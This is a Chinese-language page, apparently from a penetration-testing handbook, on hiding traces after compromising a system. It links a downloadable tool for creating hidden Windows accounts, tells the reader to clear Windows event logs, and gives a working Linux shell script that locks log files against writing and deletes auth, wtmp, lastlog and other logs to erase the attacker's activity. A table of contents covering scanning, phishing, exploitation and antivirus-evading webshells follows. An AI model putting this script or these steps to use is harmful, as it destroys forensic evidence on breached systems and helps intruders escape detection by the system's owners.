**建立windows隐藏账户**
用一个小工具生成服务端,去上传执行
链接:https://pan.baidu.com/s/18OIAWt4NXtX9-l1jBLeAng 密码:v5oa
* * * * *
**删除日志信息**
**WIndows:**
`eventvwr` 打开事件查看器删除最近日志
* * * * *
**Linux:history -c**
写个脚本:
**实现思路:**
1.查找系统和web组件日志
2.修改文件权限为不可写入(后续攻击中不记录日志,重启也不行)
3.删除可能暴露我们行踪的日志(删除我们的攻击记录)
**代码实现:**
~~~
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
#修改日志文件权限为不可写
find /var/log -name *.log | xargs chmod 551
cd /var/log && chmod 551 auth && chmod 551 auth.1 && chmod 551 messages && chmod 551 messages.1 && chmod 551 lastlog && chmod 551 wtmp && chmod 551 news
#删除日志
find /var/log -name *.log -mmin +300 | xargs rm -rf
cd /var/log && rm -rf auth.log && rm -rf auth.log.1 && rm -rf message && rm -rf message.1 && rm -rf lastlog && rm -rf wtmp && rm -rf news
# /var/log:日志存储目录
# -name *.log:log后缀的日志文件
# -mmin +300:300分钟之前修改的文件
# xargs :将find命令查找到的文件列表作为参数,执行删除操作
~~~
- 序言
- kali-Linux基本配置
- 忘记Root密码
- 更新系统和软件包
- Bash命令
- shell编程
- Linux的文件权限配置
- Linux日志文件
- 信息收集
- 被动信息收集
- 绕过CDN找真实IP
- IDS识别
- p0f-OS识别
- nmap端口扫描
- 搜索引擎
- 内网主机发现
- 使用SET社工包钓鱼
- 漏洞发现
- Nessus策略漏扫
- AWVS集成漏扫
- w3af
- 其它漏扫
- 抓包改包
- Burpsite
- Fiddler
- Wireshark
- 漏洞利用
- Hydra爆破
- SQLmap
- Metasploit
- Beef
- antSwrod
- XSS前端工具
- Windows缓冲区溢出
- 后漏洞利用阶段
- 免杀一句话
- 上传工具
- 嗅探
- 本地提取
- 隐藏痕迹